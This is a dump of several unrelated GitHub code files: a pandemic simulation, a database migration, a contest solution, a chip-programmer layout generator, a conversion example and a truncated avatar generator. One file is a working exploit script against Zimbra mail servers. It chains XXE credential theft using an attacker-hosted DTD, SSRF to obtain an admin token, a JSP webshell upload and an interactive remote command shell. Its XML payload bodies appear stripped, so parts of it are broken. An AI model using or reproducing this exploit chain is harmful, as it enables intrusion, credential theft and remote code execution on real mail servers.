self._reset(mask_cured)\n\n    def die(self):\n        mask_die = self.is_dead()\n        self.dead_day = np.sum(self.scale_each*mask_die)\n        self.dead += self.dead_day\n        self.total_population -= self.dead_day\n        self._reset(mask_die)\n\n    def _assign_timing(self, 
idx):\n self.days_to_contagious[idx] = np.random.poisson(lam=self.t_contagious, size=len(idx))\n n_deaths = np.random.binomial(len(idx), self.lethality)\n idx_dying = np.random.choice(idx, size=n_deaths, replace=False)\n idx_cure = idx[np.in1d(idx, idx_dying, invert=True)]\n self.days_to_death[idx_dying] = np.random.poisson(lam=self.t_death, size=len(idx_dying))\n self.days_to_cure[idx_cure] = np.random.poisson(lam=self.t_cured, size=len(idx_cure))\n n_confirmed = np.random.binomial(len(idx_cure), self.detection_rate)\n idx_confirmed = np.append(idx_dying, np.random.choice(idx_cure, size=n_confirmed, replace=False))\n self.days_to_detect[idx_confirmed] = np.random.poisson(lam=self.t_confirmed, size=len(idx_confirmed))\n\n def _reset(self, mask):\n self.infected[mask] = False\n self.days[mask] = 0\n self.days_to_contagious[mask] = 0\n self.days_to_death[mask] = -1\n self.days_to_cure[mask] = -1\n self.days_to_detect[mask] = -1\n self.scale_each[mask] = self.scale\n\n def _scale(self):\n if (self.fraction_buffer > 0.001) or (np.sum(self.infected) / len(self.infected) > 0.5):\n self.scale += max(1, int(self.fraction_buffer * 100000))\n else:\n self.scale = max(1, self.scale-1)\n\n def is_contagious(self):\n return self.infected & (self.days == self.days_to_contagious)\n\n def is_dead(self):\n return self.infected & (self.days == self.days_to_death)\n\n def is_cured(self):\n return self.infected & (self.days == self.days_to_cure)\n\n def is_detected(self):\n return self.infected & (self.days == self.days_to_detect)\n\n def update(self):\n self.infect()\n self.detect()\n self.cure()\n self.die()\n # self._scale()\n # print('slots used: %s \\tscale=%s' % (np.sum(self.infected), self.scale))\n self.days[self.infected] += 1\n\n\nclass DayDrivenPandemie(object):\n\n def __init__(self, n_days=100, n_p=15, attack_rate=0.15, t_contagious=4, t_cured=14, t_death=20, t_confirmed=6,\n infected_start=10, lethality=0.01, detection_rate=0.8, total_population=83e6, confirmed_start=0,\n death_pdf='skewnorm'):\n\n assert infected_start >= confirmed_start, \"More confirmed than infected people!\"\n self.n_p = n_p\n self.attack_rate = attack_rate\n self.lethality = lethality\n self.detection_rate = detection_rate\n self.t_contagious = t_contagious\n self.t_cured = t_cured\n self.t_death = t_death\n self.death_pdf = death_pdf\n self.t_confirmed = t_confirmed\n self.total_population = total_population\n # print('lethality: %s \\tR0: %s \\tdetection_rate: %s' % (lethality, attack_rate*n_p, detection_rate))\n\n self.n_p_steps = {}\n\n self.day = 0\n self.n_days = n_days\n self.contagious_p_day = np.zeros(n_days)\n self.death_p_day = np.zeros(n_days)\n self.cured_p_day = np.zeros(n_days)\n self.detect_p_day = np.zeros(n_days)\n\n self.infected, self.contagious = infected_start, 0\n self.infected_total, self.confirmed_total = infected_start, confirmed_start\n self.infected_day = 0\n self.dead, self.dead_day, self.cured = 0, 0, 0\n self._assign_timing(infected_start)\n\n def _count_p_days(self, n, t, pdf='poisson'):\n if pdf == 'poisson':\n p_days = n * poisson.pmf(np.arange(self.n_days - self.day), mu=t)\n elif pdf == 'skewnorm':\n p_days = n * skewnorm.pdf(np.arange(self.n_days - self.day), a=5, loc=t, scale=15)\n elif pdf == 'lognorm':\n p_days = n * lognorm(np.arange(self.n_days - self.day))\n else:\n raise NotImplementedError(\"Density function pdf='%s' not implemented!\" % pdf)\n return np.pad(p_days, (self.day, 0), mode='constant')\n\n def _assign_timing(self, n):\n n_death = n * self.lethality\n n_detected = 
self.detection_rate * (n - n_death) + n_death\n self.contagious_p_day += self._count_p_days(n, self.t_contagious)\n self.cured_p_day += self._count_p_days(n - n_death, self.t_cured)\n self.death_p_day += self._count_p_days(n_death, self.t_death, pdf=self.death_pdf)\n self.detect_p_day += self._count_p_days(n_detected, self.t_confirmed)\n\n def infect(self):\n immune = self.infected_total\n n_eff = self.n_p * (self.total_population - immune) / self.total_population\n self.infected_day = self.contagious_p_day[self.day] * n_eff*self.attack_rate\n # self.infected_day = np.sum(np.random.poisson(n_eff*self.attack_rate, size=self.contagious_p_day[self.day]))\n self.infected += self.infected_day\n self.infected_total += self.infected_day\n self._assign_timing(self.infected_day)\n\n def update(self, n_sim=1):\n for i in range(n_sim):\n if str(self.day) in self.n_p_steps:\n self.n_p = self.n_p_steps[str(self.day)]\n self.infect()\n self.infected -= (self.cured_p_day[self.day] + self.death_p_day[self.day])\n self.contagious += self.contagious_p_day[self.day] - self.cured_p_day[self.day] - self.death_p_day[self.day]\n self.cured += self.cured_p_day[self.day]\n self.dead += self.death_p_day[self.day]\n self.confirmed_total += self.detect_p_day[self.day]\n self.day += 1\n\n def change_n_p(self, day, n_p):\n self.n_p_steps.update({str(day): n_p})\n\n\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n import matplotlib as mpl\n from plotting import with_latex\n mpl.rcParams.update(with_latex)\n\n days = np.arange(100)\n infected, confirmed_total = np.zeros(days.size), np.zeros(days.size)\n infected_day, infected_day_confirmed = np.zeros(days.size), np.zeros(days.size)\n cured, dead = np.zeros(days.size), np.zeros(days.size)\n world = DayDrivenPandemie(n_days=len(days), lethality=0.2, detection_rate=0.8)\n for i in days:\n world.update()\n infected[i], confirmed_total[i] = world.infected_total, world.confirmed_total\n infected_day[i] = world.infected_day\n cured[i], dead[i] = world.cured, world.dead\n infected_day_confirmed[1:] = np.diff(confirmed_total)\n\n plt.plot(days, infected, color='blue', label='infected (total)')\n plt.plot(days, confirmed_total, color='blue', ls='dashed', label='confirmed (total)')\n plt.plot(days, infected_day, color='k', label='new infections')\n plt.plot(days, infected_day_confirmed, color='k', ls='dashed', label='new confirmed')\n plt.plot(days, dead, color='red', label='dead')\n plt.plot(days, cured, color='green', label='cured')\n plt.legend(loc='upper left', fontsize=14)\n # plt.yscale('log')\n plt.xlabel(\"days\")\n plt.ylabel(\"counts\")\n plt.savefig('img/first_model_day.png', bbox_inches='tight')\n plt.close()\n","repo_name":"marcus-wirtz-snkeos/corona","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29936217741","text":"\"\"\"empty message\n\nRevision ID: 5eacd17e5903\nRevises: 5ecefe1f4e99\nCreate Date: 2022-04-10 20:41:20.521081\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '5eacd17e5903'\ndown_revision = '5ecefe1f4e99'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n    op.create_table('setting',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('name', sa.String(length=255), nullable=False),\n    sa.Column('value_setting', sa.Text(), nullable=False),\n    sa.PrimaryKeyConstraint('id')\n    )\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_table('setting')\n    # ### end Alembic commands ###\n","repo_name":"Alessio-source/flask-blog","sub_path":"migrations/versions/5eacd17e5903_.py","file_name":"5eacd17e5903_.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} {"seq_id":"71656301284","text":"from collections import defaultdict\ndef Miller_Rabin(N):\n    if N <= 1:\n        return False\n    k = 0\n    m = N - 1\n    while m & 1 == 0:\n        k += 1\n        m >>= 1\n    assert(2**k*m == N-1)\n    task = [2,3,5,7,11,13,17,19,23,29,31,37,41,43,47]  # added the missing witnesses 19 and 41, so the base set is a superset of the deterministic set for N < 3.3e24\n    def test(N,t):\n        b = pow(t,m,N)\n        if b == 1:\n            return True\n        for i in range(0,k):\n            if b == N - 1:\n                return True\n            b = pow(b,2,N)\n        return False\n    for t in task:\n        if t >= N:\n            break\n        if not test(N,t):\n            return False\n    return True\ndef Legendre(A,p):\n    row_p = p\n    ans = 0\n    while A//p != 0:\n        ans += A//p\n        p *= row_p\n    return ans\nK = int(input())\nok = K\nprime = defaultdict(int)\nfor i in range(2,int(K**(0.5))+100):\n    while K%i == 0:\n        K //= i\n        prime[i] += 1\nng = 1\nwhile abs(ok-ng) > 1:\n    mid = (ok+ng)//2\n    flag = True\n    for p in prime.keys():\n        if prime[p] > Legendre(mid,p):\n            flag = False\n    if flag:\n        ok = mid\n    else:\n        ng = mid\nprint(max(ok,ng))","repo_name":"mitu24472/Atcoder","sub_path":"ABC/Atcoder Beginner Contest 280/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} {"seq_id":"1679349370","text":"#!/usr/bin/env python3\nimport re\nimport time\nimport requests\nimport html\n\nrequests.packages.urllib3.disable_warnings()\n\n# Target configuration\nTARGET_HOST = 'mail.test.com'\nTARGET_URL = f'https://{TARGET_HOST}'\n\n# URL to the malicious_dtd file\nMALICIOUS_DTD_URL = 'https://YOUR-DOMAIN/malicious_dtd'\n\n\nTIME_DELAY = 2\n\n\ndef get_credentials_via_xxe() -> tuple:\n    print('[i] Getting Zimbra credentials')\n    time.sleep(TIME_DELAY)\n    xxe_xml = f'''\n    %dtd;\n    %all;\n    ]\n    >\n    \n    \n    aaaaa\n    &fileContents;\n    \n    '''\n    time.sleep(TIME_DELAY)\n    headers = {\n        'Content-Type': 'application/xml'\n    }\n    resp = requests.post(TARGET_URL + '/Autodiscover/Autodiscover.xml', headers=headers, data=xxe_xml, verify=False)\n    try:\n        if resp.status_code == 503:\n            resp_body = html.unescape(resp.text)\n            zimbra_user = re.search(\n                r'''\\n        (.*)\\n        \\n        ''',\n                resp_body).group(1)\n            zimbra_password = re.search(\n                r'''\\n        (.*)\\n        \\n        ''',\n                resp_body).group(1)\n            print('[+] Got credentials: ' + zimbra_user + ':' + zimbra_password + '\\n')\n            return zimbra_user, zimbra_password\n        else:\n            print(f'[-] HTTP code = {resp.status_code} != 503. Terminating program...')\n            exit()\n    except RuntimeError:\n        print('[-] Unknown error. 
Terminating program...')\n exit()\n\n\ndef get_low_privilege_token(credentials: tuple) -> str:\n print('[i] Getting low-privilege token')\n time.sleep(TIME_DELAY)\n zm_auth_token_xml = f'''\n \n \n \n \n \n \n \n {credentials[0]}\n {credentials[1]}\n \n \n '''\n headers = {\n 'Content-Type': 'application/xml'\n }\n resp = requests.post(TARGET_URL + '/service/soap', headers=headers, data=zm_auth_token_xml, verify=False)\n try:\n if resp.status_code == 200:\n zm_auth_token = re.search('''(.*)''', resp.text).group(1)\n print('[+] Got low-privilege token: ' + zm_auth_token + '\\n')\n return zm_auth_token\n else:\n print(f'[-] HTTP code = {resp.status_code} != 200. Terminating program...')\n exit()\n except RuntimeError:\n print('[-] Unknown error. Terminating program...')\n exit()\n\n\ndef get_high_privilege_token_via_ssrf(zm_auth_token: str) -> str:\n print('[i] Getting high-privilege token')\n time.sleep(TIME_DELAY)\n zm_admin_auth_token_xml = f'''\n \n \n \n \n \n \n \n {credentials[0]}\n {credentials[1]}\n \n \n '''\n headers = {\n 'Content-Type': 'application/xml',\n 'Host': f'{TARGET_HOST}:7071'\n }\n cookies = {\n 'ZM_ADMIN_AUTH_TOKEN': f'{zm_auth_token}'\n }\n resp = requests.post(TARGET_URL + f'/service/proxy?target=https://127.0.0.1:7071/service/admin/soap',\n headers=headers, cookies=cookies, data=zm_admin_auth_token_xml, verify=False)\n try:\n if resp.status_code == 200:\n zm_admin_auth_token = re.search('''(.*)''', resp.text).group(1)\n print('[+] Got high-privilege token: ' + zm_admin_auth_token + '\\n')\n return zm_admin_auth_token\n else:\n print(f'[-] HTTP code = {resp.status_code} != 200. Terminating program...')\n exit()\n except RuntimeError:\n print('[-] Unknown error. Terminating program...')\n exit()\n\n\ndef upload_webshell(zm_admin_auth_token: str):\n print('[i] Uploading webshell')\n time.sleep(TIME_DELAY)\n files = {\n 'file1': ('shell.jsp', open('shell.jsp', 'rb'), 'application/octet-stream')\n }\n cookies = {\n 'ZM_ADMIN_AUTH_TOKEN': f'{zm_admin_auth_token}'\n }\n resp = requests.post(TARGET_URL + '/service/extension/clientUploader/upload/', cookies=cookies, files=files,\n verify=False)\n try:\n if resp.status_code == 200:\n print(f'[+] Uploaded webshell. Location {TARGET_URL}/downloads/shell.jsp\\n')\n else:\n print(f'[-] HTTP code = {resp.status_code} != 200. Terminating program...')\n exit()\n except RuntimeError:\n print('[-] Unknown error. Terminating program...')\n exit()\n\n\ndef rce_via_webshell(zm_admin_auth_token: str):\n try:\n while True:\n cmd = input('\\u001b[32mwebshell@target$ \\u001b[0m')\n data = {\n 'cmd': cmd\n }\n cookies = {\n 'ZM_ADMIN_AUTH_TOKEN': f'{zm_admin_auth_token}'\n }\n resp = requests.post(TARGET_URL + '/downloads/shell.jsp', cookies=cookies, data=data, verify=False)\n try:\n if resp.status_code == 200:\n result = re.search(r'''\\n([\\w\\W]*)\\n''', resp.text)\n if isinstance(result, re.Match):\n print(result.group(1))\n else:\n print('[i] There is no command\\'s output')\n else:\n print(f'[-] HTTP code = {resp.status_code} != 200. Terminating program...')\n exit()\n except RuntimeError:\n print('[-] Unknown error. 
Terminating program...')\n exit()\n except KeyboardInterrupt:\n print('\\n[i] Exited by user')\n exit()\n\n\nif __name__ == '__main__':\n credentials = get_credentials_via_xxe()\n\n zm_auth_token = get_low_privilege_token(credentials)\n\n zm_admin_auth_token = get_high_privilege_token_via_ssrf(zm_auth_token)\n\n upload_webshell(zm_admin_auth_token)\n\n rce_via_webshell(zm_admin_auth_token)\n","repo_name":"nth347/Zimbra-RCE-exploit","sub_path":"exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":7044,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"52"} +{"seq_id":"15542121798","text":"from .util import *\nfrom .top_devices import *\n\n\nclass LayoutGenerator:\n\t\"Layout generator baseclass.\"\n\n\tclass MapError(Exception): pass\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef setProgrammerType(self, programmer=\"TOP2049\"):\n\t\tsupportedDevices = {\n\t\t\t# Map deviceName : layoutModules, ZIF-pin-count\n\t\t\t\"TOP2049\"\t: (top2049_vcc_layouts, top2049_vpp_layouts,\n\t\t\t\t\t top2049_gnd_layouts, 48)\n\t\t}\n\t\ttry:\n\t\t\t(vcc_layouts, vpp_layouts, gnd_layouts, zifPins) = \\\n\t\t\t\tsupportedDevices[programmer.upper()]\n\t\texcept (KeyError) as e:\n\t\t\traise TOPException(\"Programmer \" + programmer + \" not supported\")\n\t\tself.vccLayout = vcc_layouts.VCCLayout()\n\t\tself.vppLayout = vpp_layouts.VPPLayout()\n\t\tself.gndLayout = gnd_layouts.GNDLayout()\n\t\tself.zifPins = zifPins\n\n\tdef setPins(self, vccPin, vppPins, gndPin):\n\t\t\"\"\"Load the supply pin locations.\n\t\tvppPins may either be one pin number or a list of pin numbers or None.\"\"\"\n\t\tself.vccPin = vccPin\n\t\tif vppPins is None:\n\t\t\tself.vppPins = [ ]\n\t\telse:\n\t\t\ttry:\n\t\t\t\tself.vppPins = list(vppPins)\n\t\t\texcept TypeError:\n\t\t\t\tself.vppPins = [ vppPins, ]\n\t\tself.gndPin = gndPin\n\t\tself.verifyPins()\n\n\tdef getZifPinForPackagePin(self, packagePin):\n\t\t\"Get the ZIF pin number corresponding to the package pin number\"\n\t\treturn self.mapPin2zif(packagePin, self.result_offset,\n\t\t\t\t self.result_upsideDown)\n\n\tdef verifyPins(self):\n\t\tpass\n\n\tdef maxOffset(self, upsideDown):\n\t\t\"Returns the max possible chip offset (in the ZIF socket)\"\n\t\traise TOPException(\"Reimplement me\")\n\n\tdef mapToZIF(self, offset, upsideDown):\n\t\t\"Tries to map the chip into the ZIF socket\"\n\t\tif offset < 0 or offset > self.maxOffset(upsideDown):\n\t\t\traise self.MapError()\n\n\t\t# Find a GND layout\n\t\tzifGndPin = self.mapPin2zif(self.gndPin, offset, upsideDown)\n\t\tself.result_GND = self.__findSingleLayout(\n\t\t\t\t\tself.gndLayout,\n\t\t\t\t\t(1 << (zifGndPin - 1)))\n\n\t\t# Find a VCC layout\n\t\tzifVccPin = self.mapPin2zif(self.vccPin, offset, upsideDown)\n\t\tself.result_VCC = self.__findSingleLayout(\n\t\t\t\t\tself.vccLayout,\n\t\t\t\t\t(1 << (zifVccPin - 1)))\n\n\t\t# Find a (possibly cumulative) VPP layout\n\t\tif not self.vppPins:\n\t\t\tself.result_VPP = None\n\t\telse:\n\t\t\tzifVppMask = 0\n\t\t\tfor vppPin in self.vppPins:\n\t\t\t\tpin = self.mapPin2zif(vppPin, offset, upsideDown)\n\t\t\t\tzifVppMask |= (1 << (pin - 1))\n\t\t\tself.result_VPP = self.__findCumulativeLayout(\n\t\t\t\t\t\tself.vppLayout,\n\t\t\t\t\t\tzifVppMask)\n\n\t\t# Also store the chip orientation for later use.\n\t\tself.result_upsideDown = upsideDown\n\t\tself.result_offset = offset\n\n\tdef mapPin2zif(self, packagePin, offset, upsideDown):\n\t\t\"Map a package pin to a ZIF pin. 
Returns the ZIF pin number.\"\n\t\traise TOPException(\"Reimplement me\")\n\n\tdef zifLayoutAsciiArt(self):\n\t\t\"Returns nice ascii ART of the mapped ZIF socket\"\n\t\traise TOPException(\"Reimplement me\")\n\n\tdef zifPinAssignments(self):\n\t\t\"Returns a string describing the pin assignments\"\n\t\tvcc = str(self.__bitmask2pinList(self.result_VCC[1])).strip(\"[]\")\n\t\tret = \"VCC ZIF pins: \" + vcc + \"\\n\"\n\t\tif self.result_VPP:\n\t\t\tvppBitmask = 0\n\t\t\tfor (id, mask) in self.result_VPP:\n\t\t\t\tvppBitmask |= mask\n\t\t\tvpp = str(self.__bitmask2pinList(vppBitmask)).strip(\"[]\")\n\t\t\tret += \"VPP ZIF pins: \" + vpp + \"\\n\"\n\t\tgnd = str(self.__bitmask2pinList(self.result_GND[1])).strip(\"[]\")\n\t\tret += \"GND ZIF pins: \" + gnd + \"\\n\"\n\t\treturn ret\n\n\tdef __bitmask2pinList(self, bitmask):\n\t\tret = []\n\t\tbit = 0\n\t\twhile bitmask:\n\t\t\tif bitmask & (1 << bit):\n\t\t\t\tret.append(bit + 1)\n\t\t\tbitmask &= ~(1 << bit)\n\t\t\tbit += 1\n\t\treturn ret\n\n\tdef __pinList2Bitmask(self, pinList):\n\t\tbitmask = 0\n\t\tfor pin in pinList:\n\t\t\tassert(pin >= 1)\n\t\t\tbitmask |= (1 << (pin - 1))\n\t\treturn bitmask\n\n\tdef recalculate(self):\n\t\t\"Redo the mapping calculation\"\n\t\tfor upsideDown in (False, True):\n\t\t\toffset = self.maxOffset(upsideDown)\n\t\t\twhile offset >= 0:\n\t\t\t\ttry:\n\t\t\t\t\tself.mapToZIF(offset, upsideDown)\n\t\t\t\texcept (LayoutGenerator.MapError) as e:\n\t\t\t\t\toffset -= 1\n\t\t\t\t\tcontinue\n\t\t\t\treturn\n\t\traise TOPException(\"Did not find a possible valid layout for the setup\")\n\n\tdef getGNDLayout(self):\n\t\t\"Get the calculated GND layout ID and mask. Returns a tuple (ID, mask).\"\n\t\treturn self.result_GND\n\n\tdef applyGNDLayout(self, top):\n\t\t\"Send the GND layout to hardware\"\n\t\t(layoutID, layoutMask) = self.getGNDLayout()\n\t\ttop.gnd.setLayoutID(layoutID)\n\n\tdef getVCCLayout(self):\n\t\t\"Get the calculated VCC layout ID and mask. 
Returns a tuple (ID, mask).\"\n\t\treturn self.result_VCC\n\n\tdef applyVCCLayout(self, top):\n\t\t\"Send the VCC layout to hardware\"\n\t\t(layoutID, layoutMask) = self.getVCCLayout()\n\t\ttop.vcc.setLayoutID(layoutID)\n\n\tdef getVPPLayouts(self):\n\t\t\"\"\"Get the calculated VPP layout IDs and masks.\n\t\tReturns a list of tuples ((ID, mask), (ID, mask), ...)\"\"\"\n\t\treturn self.result_VPP\n\n\tdef applyVPPLayout(self, top, packagePins=[]):\n\t\t\"\"\"Send the VPP layout to hardware.\n\t\tpackagePins is a list of pins (on the chip package) to activate.\n\t\tIf packagePins is not passed, all VPP pins are driven to VPP.\"\"\"\n\t\tif packagePins:\n\t\t\tpins = []\n\t\t\tfor pin in packagePins:\n\t\t\t\tpins.append(self.mapPin2zif(pin, self.result_offset,\n\t\t\t\t\t\t\t self.result_upsideDown))\n\t\t\tpackagePinsMask = self.__pinList2Bitmask(pins)\n\t\ttop.vpp.setLayoutMask(0) # Reset\n\t\tlayouts = self.getVPPLayouts()\n\t\tif layouts:\n\t\t\tfor (layoutID, mask) in layouts:\n\t\t\t\tif packagePins:\n\t\t\t\t\tif mask & packagePinsMask == 0:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif mask & packagePinsMask != mask:\n\t\t\t\t\t\traise TOPException(\n\t\t\t\t\t\t\t\"Unable to apply partial VPP layout\")\n\t\t\t\ttop.vpp.setLayoutID(layoutID)\n\n\tdef __findSingleLayout(self, layoutDefs, zifBitmask):\n\t\t# Returns an (id, mask) tuple\n\t\tfor (id, mask) in layoutDefs.supportedLayouts():\n\t\t\tif zifBitmask == mask:\n\t\t\t\tbreak\n\t\telse:\n\t\t\traise self.MapError()\n\t\treturn (id, mask)\n\n\tdef __findCumulativeLayout(self, layoutDefs, zifBitmask):\n\t\t# Returns a list of (id, mask) tuples\n\t\tresult = []\n\t\tfor (id, mask) in layoutDefs.supportedLayouts():\n\t\t\tif zifBitmask == 0:\n\t\t\t\tbreak\n\t\t\tif mask == 0:\n\t\t\t\tcontinue\n\t\t\tif mask & zifBitmask == mask:\n\t\t\t\tresult.append( (id, mask) )\n\t\t\t\tzifBitmask &= ~mask\n\t\tif zifBitmask:\n\t\t\traise self.MapError()\n\t\treturn result\n\nclass LayoutGeneratorDIP(LayoutGenerator):\n\t\"Layout generator for DIP packages.\"\n\n\tdef __init__(self, nrPins):\n\t\tLayoutGenerator.__init__(self)\n\t\tself.nrPins = nrPins\n\n\tdef verifyPins(self):\n\t\tLayoutGenerator.verifyPins(self)\n\t\tif self.nrPins < 2 or self.nrPins > self.zifPins or self.nrPins % 2 != 0:\n\t\t\traise TOPException(\"Invalid DIP package\")\n\t\tif self.vccPin < 1 or self.vccPin > self.nrPins:\n\t\t\traise TOPException(\"Invalid VCC pin number for the selected package\")\n\t\tfor vppPin in self.vppPins:\n\t\t\tif vppPin < 1 or vppPin > self.nrPins:\n\t\t\t\traise TOPException(\"Invalid VPP pin number for the selected package\")\n\t\tif self.gndPin < 1 or self.gndPin > self.nrPins:\n\t\t\traise TOPException(\"Invalid GND pin number for the selected package\")\n\n\tdef maxOffset(self, upsideDown):\n\t\treturn self.zifPins // 2 - self.nrPins // 2\n\n\tdef mapPin2zif(self, dipPin, offset, upsideDown):\n\t\tassert(dipPin >= 1 and dipPin <= self.nrPins)\n\t\tif upsideDown:\n\t\t\tif dipPin > self.nrPins // 2:\n\t\t\t\t# Right side of DIP\n\t\t\t\tdipPin -= self.nrPins // 2\n\t\t\t\treturn dipPin + offset\n\t\t\telse:\n\t\t\t\t# Left side of DIP\n\t\t\t\treturn self.zifPins - self.nrPins // 2 + dipPin - offset\n\t\telse:\n\t\t\tif dipPin > self.nrPins // 2:\n\t\t\t\t# Right side of DIP\n\t\t\t\tdipPin -= self.nrPins // 2\n\t\t\t\treturn self.zifPins - self.nrPins // 2 + dipPin - offset\n\t\t\telse:\n\t\t\t\t# Left side of DIP\n\t\t\t\treturn dipPin + offset\n\n\tdef zifLayoutAsciiArt(self):\n\t\tdef line(prefix, content, postfix):\n\t\t\treturn \"%3s %s 
%3s\\n\" % (prefix, content, postfix)\n\n\t\tzifGnd = self.getZifPinForPackagePin(self.gndPin)\n\t\tzifVcc = self.getZifPinForPackagePin(self.vccPin)\n\t\tzifVpp = [ self.getZifPinForPackagePin(p) \\\n\t\t\t   for p in self.vppPins ]\n\n\t\tret = line(\"\", \"T  ZIF socket\", \"\")\n\t\tret += line(\"\", \"^--o==============o\", \"\")\n\t\tfor zp in range(1, self.zifPins // 2 + 1):\n\t\t\tprefix, postfix = \"\", \"\"\n\t\t\tif zp == zifGnd:\n\t\t\t\tprefix = \"GND\"\n\t\t\tif self.zifPins - zp + 1 == zifGnd:\n\t\t\t\tpostfix = \"GND\"\n\t\t\tif zp == zifVcc:\n\t\t\t\tprefix = \"VCC\"\n\t\t\tif self.zifPins - zp + 1 == zifVcc:\n\t\t\t\tpostfix = \"VCC\"\n\t\t\tif zp in zifVpp:\n\t\t\t\tprefix = \"VPP\"\n\t\t\tif self.zifPins - zp + 1 in zifVpp:\n\t\t\t\tpostfix = \"VPP\"\n\n\t\t\tif zp < self.result_offset + 1 or \\\n\t\t\t   zp > self.result_offset + self.nrPins // 2:\n\t\t\t\tret += line(prefix,\n\t\t\t\t\t\"%2d |----- || -----| %2d\" %\\\n\t\t\t\t\t(zp, self.zifPins + 1 - zp),\n\t\t\t\t\tpostfix)\n\t\t\telse:\n\t\t\t\tif zp == self.result_offset + 1 and \\\n\t\t\t\t   not self.result_upsideDown:\n\t\t\t\t\tret += line(prefix,\n\t\t\t\t\t\t\"%2d |-- 1##..##o --| %2d\" %\\\n\t\t\t\t\t\t(zp, self.zifPins + 1 - zp),\n\t\t\t\t\t\tpostfix)\n\t\t\t\telif zp == self.result_offset + self.nrPins // 2 and \\\n\t\t\t\t     self.result_upsideDown:\n\t\t\t\t\tret += line(prefix,\n\t\t\t\t\t\t\"%2d |-- o##''##1 --| %2d\" %\\\n\t\t\t\t\t\t(zp, self.zifPins + 1 - zp),\n\t\t\t\t\t\tpostfix)\n\t\t\t\telse:\n\t\t\t\t\tret += line(prefix,\n\t\t\t\t\t\t\"%2d |-- o######o --| %2d\" %\\\n\t\t\t\t\t\t(zp, self.zifPins + 1 - zp),\n\t\t\t\t\t\tpostfix)\n\t\tret += line(\"\", \"   o==============o\", \"\")\n\t\treturn ret\n\ndef createLayoutGenerator(package):\n\ttry:\n\t\tfor regex in (r\"DIP(\\d+)\", r\"PDIP(\\d+)\", r\"SO(\\d+)\", r\"TSSOP(\\d+)\", ):  # raw strings avoid invalid-escape-sequence warnings\n\t\t\tm = re.match(regex, package, re.IGNORECASE)\n\t\t\tif m:\n\t\t\t\tnrPins = int(m.group(1))\n\t\t\t\treturn LayoutGeneratorDIP(nrPins)\n\t\tif package.upper() == \"PLCC32\": # 1:1 adapter\n\t\t\treturn LayoutGeneratorDIP(32)\n\t\tif package.upper() == \"PLCC44\": # 1:1 adapter\n\t\t\treturn LayoutGeneratorDIP(44)\n\t\traise ValueError()\n\texcept (ValueError) as e:\n\t\traise TOPException(\"Unknown package type \" + package)\n","repo_name":"mbuesch/toprammer","sub_path":"libtoprammer/layout_generator.py","file_name":"layout_generator.py","file_ext":"py","file_size_in_byte":9421,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"52"} {"seq_id":"5212707496","text":"#!/usr/bin/env python3\n\n'''\nA more practical example of passing functions as arguments and calling those\nfunctions inside the function body. This script simply converts a sequence of\nnumbers to the same type using the conversion function passed in; the calls at\nthe bottom pass the built-in functions int() and float() into convert().\n'''\n\ndef convert(func, seq):\n    'conv. 
sequence of numbers to same type'\n return [func(eachNum) for eachNum in seq]\n\nmyseq = (123, 45.67, -6.2e8, 9999999999999999)\n\nprint(convert(int, myseq))\nprint(convert(float, myseq))\n\n","repo_name":"ulric-li/codebase","sub_path":"python/numConv.py","file_name":"numConv.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2334445155","text":"import requests\nimport json\nfrom PIL import Image\nfrom io import BytesIO\nfrom config import OPENAI_API_KEY # Assuming OPENAI_API_KEY is defined in config.py\n\ndef fetch_character_details(global_cache):\n \"\"\"\n Fetch character details from the global cache.\n \"\"\"\n character_details = global_cache.get('character_details', {})\n return character_details\n\ndef generate_avatar_image(character_details):\n \"\"\"\n Generate an avatar image based on the character details using the OpenAI API.\n \"\"\"\n prompt = f\"A {character_details.get('gender', 'unspecified')} character with {character_details.get('eye_color', 'unspecified')} eyes and {character_details.get('hair_color', 'unspecified')} hair, having a {character_details.get('body_type', 'unspecified')} body type.\"\n \n url = \"https://api.openai.com/v1/images/generations\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": f\"Bearer {OPENAI_API_KEY}\"\n }\n data = {\n \"prompt\": prompt,\n \"n\": 1,\n \"size\": \"512x512\",\n \"response_format\": \"url\"\n }\n response = requests.post(url, headers=headers, json=data)\n \n if response.status_code == 200:\n image_url = response.json()[\"data\"][0][\"url\"]\n image_response = requests.get(image_url)\n image = Image.open(BytesIO(image_response.content))\n avatar_path = f\"C:\\\\Users\\\\Luca\\\\Documents\\\\GITHUB\\\\AgarthaRPG\\\\dev_app\\\\game\\\\avatar\\\\{character_details['username']}_{character_details['character_name']}.png\"\n image.save(avatar_path)\n return avatar_path\n else:\n return None\n\ndef generate_character_description(character_details):\n \"\"\"\n Generate a textual description of the character using the OpenAI API.\n \"\"\"\n prompt = f\"Tell me more about a {character_details.get('gender', 'unspecified')} character with {character_details.get('eye_color', 'unspecified')} eyes and {character_details.get('hair_color', 'unspecified')} hair, having a {character_details.get('body_type', 'unspecified')} body type.\"\n \n url = \"https://api.openai.com/v1/chat/completions\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": f\"Bearer {OPENAI_API_KEY}\"\n }\n data = {\n \"model\": \"gpt-3.5-turbo\",\n \"messages\": [\n {\n \"role\": \"system\",\n \"content\": \"You are a helpful assistant.\"\n },\n {\n \"role\": \"user\",\n \"content\": prompt\n 